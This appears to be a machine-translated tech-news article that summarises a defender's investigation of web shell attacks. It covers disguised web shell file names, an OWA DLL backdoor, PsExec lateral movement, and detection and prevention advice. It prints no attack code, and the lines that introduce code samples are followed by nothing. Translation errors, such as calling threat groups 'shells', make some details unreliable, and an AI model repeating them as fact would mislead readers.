Shulou(Shulou.com)05/31 Report--

This article shares with you the content of a sample analysis of a survey of web Shell attacks in shell. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

Recently, a misconfiguration of a server has been discovered and an attacker can deploy webshell in multiple folders on the web server, resulting in an attack on the service account and domain management account. Attackers use net.exe to perform reconnaissance, use nbstat.exe to scan other target systems, and eventually use PsExec to move sideways.

The attacker installed additional web shell on other systems and DLL backdoors on the outlookweb Access (OWA) server. For persistent control on the server, the backdoor registers itself as a service or Exchange transport agent, allowing it to access and intercept all incoming and outgoing e-mails and collect sensitive information. The backdoor also executes other attack commands and downloads malicious payloads. In addition, the attacker sent a special email, which the DLL backdoor interpreted as a command.

This case is one of the most common web attacks, affecting multiple organizations in all departments. Commonly used web development programming languages (such as ASP, PHP, JSP) write malicious code, which is implanted into the web server by attackers to remotely access and execute the code, and steal data from the Web server by executing commands.

Web Shell attacks in the current situation

Several shell including ZINC, KRYPTON and GALLIUM were observed in the attack. To plant webshell, attackers exploit web server security vulnerabilities exposed on the Internet, usually in web applications, such as CVE-2019-0604 or CVE-2019-16759.

In the investigation of these types of attacks, it was found that the web shell in the file attempted to hide or mix using the legal file name in the web server, for example:

Index.aspx

Fonts.aspx

Css.aspx

Global.aspx

Default.php

Function.php

Fileuploader.php

Help.js

Write.jsp

31.jsp

China Chopper is one of the most commonly used web shell. Common examples are as follows:

The jsp malicious code found in the server is as follows:

China Chopper variants written in php:

KRYPTON uses web shell written in C # in an ASP.NET page:

Once web shell is successfully plugged into the web server, an attacker can perform various tasks on the web server. Webshell can steal data, exploit vulnerabilities, and run other malicious commands for further destruction.

Web shell has affected many industries, and public sector organizations are one of the most common target sectors. In addition to exploiting vulnerabilities in web applications or web servers, attackers also exploit other vulnerabilities in the server. For example, the lack of the latest security updates, anti-virus tools, network protection, security configuration and so on. Attacks usually occur on weekends or during breaks, when the attack may not be detected and responded immediately. These exploits are so common that ATP (MSFT) detects an average of 77000 webshell-related files on 46000 different machines each month.

Detection and prevention

Because webshell is a multifaceted threat, enterprises should build comprehensive defenses from multiple attack areas: authentication, endpoints, email and data, applications, and infrastructure.

Understanding internet-oriented servers is the key to detecting and resolving web threats. You can detect the installation of web shell by monitoring file writes in the web application directory. Applications such as Outlook Web Access (OWA) rarely change after installation, and writing to these application directories should be considered suspicious.

Detect webshell activity by analyzing the processes created by the Information Services (IIS) w3wp.exe. Process sequences associated with reconnaissance activities, such as net.exe, ping.exe, systeminfo.exe, and hostname.exe process sequences. Any cmd.exe process that w3wp.exe runs in an application pool that does not normally execute processes such as "MSExchangeOWAAppPool" should be considered an exception and potentially malicious behavior.

As with most security issues, prevention is crucial. The ability of the system to resist webshell attacks can be enhanced by taking the following precautions:

1. Identify and fix vulnerabilities or misconfigurations in web applications and web servers, and update them in a timely manner.

2. Regularly audit and check the logs of the web server, and pay attention to all systems directly exposed to the internet.

3. Use Windows Defender firewalls, intrusion prevention devices and network firewalls as far as possible to prevent command execution between endpoints and communicate with control servers, and restrict lateral movement and other attacks.

4. Check perimeter firewalls and proxies to restrict unnecessary access to services, including access to services through non-standard ports.

5. Enable cloud protection to get the latest defense measures.

6. To educate end users on how to prevent malware infection, the establishment of users is to carry out credential restrictions.

Thank you for reading! This is the end of the article on "sample Analysis of web Shell attack investigation in shell". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, you can share it for more people to see!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.